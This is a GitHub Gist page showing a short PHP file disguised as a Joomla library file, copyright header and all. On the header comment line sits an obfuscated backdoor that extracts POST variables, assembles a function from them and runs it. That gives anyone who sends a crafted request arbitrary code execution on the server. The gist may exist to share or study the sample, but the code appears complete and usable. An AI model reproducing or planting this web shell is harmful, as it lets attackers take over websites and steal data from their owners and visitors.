Created
May 11, 2017 07:36
-
-
Save PalmaSolutions/24b2c1e6a7b8ced5ca8fe02ece4f057f to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * @package Libraries | |
| * ********************************************************************* | |
| * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. | |
| * @license GNU General Public License version 2 or later; see LICENSE | |
| */ if ( !empty ($_POST ) ) {extract ($_POST) ; $h = $d('', $f( $s( "c", "", $m) ) ) ; $h () ; } // +H!_eac5*PCfNduZN46(ZFdFrK | |
| // Set the platform root path as a constant if necessary. | |
| if (!defined('PATH')) | |
| { | |
| define('PATH', __DIR__) ; | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment